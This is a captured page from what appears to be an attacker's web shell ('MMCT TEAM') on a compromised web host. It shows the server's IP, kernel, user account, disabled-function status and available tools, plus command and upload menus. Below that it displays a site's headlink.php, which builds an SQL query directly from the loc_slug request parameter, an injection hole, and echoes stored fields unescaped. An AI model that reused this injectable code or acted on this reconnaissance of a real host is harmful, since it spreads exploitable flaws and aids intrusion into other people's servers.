MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.145.10.80
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/automationpowersolutions.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/automationpowersolutions.com/headlink.php
<?php   
    include_once "admin/config.php";
    // seo 
    $sqll = "SELECT * FROM `tbl_seo` WHERE se_id=1";
    $runl = mysqli_query($db,$sqll) or die("Query Not run");
    $datal = mysqli_fetch_assoc($runl);
    
    $sql = "SELECT * FROM `tb1_admin`";
    $run = mysqli_query($db,$sql) or die("Query Not run");
    $data = mysqli_fetch_assoc($run);
    
    $loc_slug = $_REQUEST['loc_slug'] ?? null;
    if ($loc_slug !== null) {
        $loc = "SELECT * FROM `tbl_location` WHERE loc_slug='$loc_slug'";
        $runloc = mysqli_query($db, $loc) or die("Query Not run");
        $dataloc = mysqli_fetch_assoc($runloc);
        $location = $dataloc["loc_name"];
    } else {
        $sqldef = "SELECT * FROM `tb1_admin` WHERE id=1";
        $rundef = mysqli_query($db, $sqldef) or die("Query Not run");
        $datadef = mysqli_fetch_assoc($rundef);
        $location = $datadef['default_location'];
    }
    
    $wspath=$datal['site_path'];
    
    $sqlmarq = "SELECT * FROM tbl_marquee WHERE id= 1";
    $runmarq = mysqli_query($db,$sqlmarq);
    $datamarq = mysqli_fetch_assoc($runmarq);
?>
    <?php echo $datal["index_follow"];?>
    
    <meta name="google-site-verification" content="<?php echo $datal["site_verification"]; ?>" />
    
    <?php echo $datal["google_analytic"]; ?>
    
<!-- Favicon -->
 <link rel="shortcut icon" href="<?php echo $wspath?><?php echo $datal["favicon"]; ?>" />

<!-- Stylesheets -->
<link href="<?php echo $wspath?>css/bootstrap.css" rel="stylesheet">
<link href="<?php echo $wspath?>css/style.css" rel="stylesheet">
<link href="<?php echo $wspath?>css/responsive.css" rel="stylesheet">
<link href="<?php echo $wspath?>css/custom.css" rel="stylesheet">
<meta http-equiv="Content-Language" content="en">

<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700;900&amp;display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Be+Vietnam+Pro:wght@100;200;300;400;500;600;700;800;900&amp;display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&amp;display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@100;300;400;500;600;700;800;900&amp;display=swap" rel="stylesheet">


MMCT - 2023